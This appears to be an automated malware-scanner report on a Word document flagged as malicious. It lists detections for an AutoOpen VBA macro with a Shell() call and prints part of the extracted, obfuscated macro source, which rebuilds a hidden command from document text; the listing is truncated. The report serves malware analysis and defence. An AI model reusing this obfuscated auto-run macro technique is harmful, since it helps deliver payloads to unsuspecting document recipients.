Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call, indicating an attempt to execute an external command. This behavior strongly suggests the document is designed to download and execute a secondary payload, aligning with common malware delivery tactics.
Heuristics (7)

- ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6379 bytes |

SHA-256: 567016888208b6e43d6d992861ce39d43df3126eb4593b0f8c99e8ce90a5c340

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub FDaKXMCaL()
TNmnzMtcP = "" + HBoZZwoN + KKavLLs + izjzlBXv + WRTooNCV + "coMments" + HBoZZwoN + KKavLLs + izjzlBXv + WRTooNCV + UiaOljp + OEiSQO + qTzMzWA + diaXuq + bUiHBiZ
cEGmTkFXzc = Right(Left((fDNWIiius(TNmnzMtcP)), 16987), 116)
KiDiuoujQ = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 1981), 99)
kQBcztw = Mid((fDNWIiius(TNmnzMtcP)), 7172, 185)
coOPSYPMM = Mid((fDNWIiius(TNmnzMtcP)), 14956, 132)
YYPpCX = Mid((fDNWIiius(TNmnzMtcP)), 14092, 88)
dJhYzoV = Right(Left((fDNWIiius(TNmnzMtcP)), 10840), 151)
HIiBprC = Right(Left((fDNWIiius(TNmnzMtcP)), 1317), 116)
nLVZhUH = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 11572), 23)
XvPRbz = cEGmTkFXzc + KiDiuoujQ + kQBcztw + coOPSYPMM + YYPpCX + dJhYzoV + HIiBprC + nLVZhUH
EiKih = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 8243), 38)
jjquDcN = Mid((fDNWIiius(TNmnzMtcP)), 788, 152)
zJWEiinUj = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 6271), 153)
GBMOTb = Mid((fDNWIiius(TNmnzMtcP)), 2598, 155)
dIIintq = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 7469), 117)
ndnftWVqpBN = XvPRbz + EiKih + jjquDcN + zJWEiinUj + GBMOTb + dIIintq
XbbcAznVo = Mid((fDNWIiius(TNmnzMtcP)), 5259, 140)
KrsmjcZaH = Right(Left((fDNWIiius(TNmnzMtcP)), 4888), 10)
bniFumSHQ = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4311), 49)
JSZKcukLR = Right(Left((fDNWIiius(TNmnzMtcP)), 2382), 109)
wifcEG = Right(Left((fDNWIiius(TNmnzMtcP)), 9409), 32)
fFSoAnuvDA = Right(Left((fDNWIiius(TNmnzMtcP)), 16837), 147)
OBdiaNZzf = Right(Left((fDNWIiius(TNmnzMtcP)), 4808), 56)
ztTqzZRiLhc = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 18060), 157)
NItvEz = ndnftWVqpBN + XbbcAznVo + KrsmjcZaH + bniFumSHQ + JSZKcukLR + wifcEG + fFSoAnuvDA + OBdiaNZzf + ztTqzZRiLhc
ZIpJVujwu = Right(Left((fDNWIiius(TNmnzMtcP)), 14629), 36)
SrzlwCrvoC = Right(Left((fDNWIiius(TNmnzMtcP)), 18962), 162)
IljlavucO = Right(Left((fDNWIiius(TNmnzMtcP)), 15856), 165)
IUNSUjsZn = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4844), 7)
sWJHzCFGDiI = Mid((fDNWIiius(TNmnzMtcP)), 11981, 65)
zsXbM = NItvEz + ZIpJVujwu + SrzlwCrvoC + IljlavucO + IUNSUjsZn + sWJHzCFGDiI
jWMvcdDNs = Mid((fDNWIiius(TNmnzMtcP)), 12130, 16)
SwsXHnzz = Mid((fDNWIiius(TNmnzMtcP)), 5006, 67)
ujamYokYR = Mid((fDNWIiius(TNmnzMtcP)), 7029, 119)
pMSiuHB = Right(Left((fDNWIiius(TNmnzMtcP)), 10602), 36)
SfYjnDHU = Right(Left((fDNWIiius(TNmnzMtcP)), 7608), 5)
NrZDpnlJEp = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 3701), 100)
bDJdlZpNjz = Mid((fDNWIiius(TNmnzMtcP)), 10395, 163)
OOKtwVj = Mid((fDNWIiius(TNmnzMtcP)), 9090, 11)
dvbPJc = Right(Left((fDNWIiius(TNmnzMtcP)), 12395), 53)
wzpGcE = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 6447), 61)
KRhfBHPW = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 10048), 143)
bdrKjICjzI = Mid((fDNWIiius(TNmnzMtcP)), 359, 191)
bzvEhA = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 11140), 156)
lJpWoD = Right(Left((fDNWIiius(TNmnzMtcP)), 8742), 91)
HVjEJVARR = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 4213), 86)
jDwGMo = Mid((fDNWIiius(TNmnzMtcP)), 17531, 125)
kkzaPrtCRn = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmnzMtcP))) - 728), 58)
jJSZbbi = Mid((fDNWIiius(TNmnzMtcP)), 2851, 160)
wdmsn = Right(Left((fDNWIiius(TNmnzMtcP)), 5159), 39)
pDdirN = Mid((fDNWIiius(TNmnzMtcP)), 17327, 181)
JvQMP = Mid((fDNWIiius(TNmnzMtcP)), 11657, 50)
iwSjXlWik = Right(Left((fDNWIiius(TNmnzMtcP)), 12571), 30)
jnGKhcukMOJ = Right(Left((fDNWIiius(TNmnzMtcP)), 6887), 151)
SuSPfLRno = Left(Right((fDNWIiius(TNmnzMtcP)), Len((fDNWIiius(TNmn ... (truncated)
```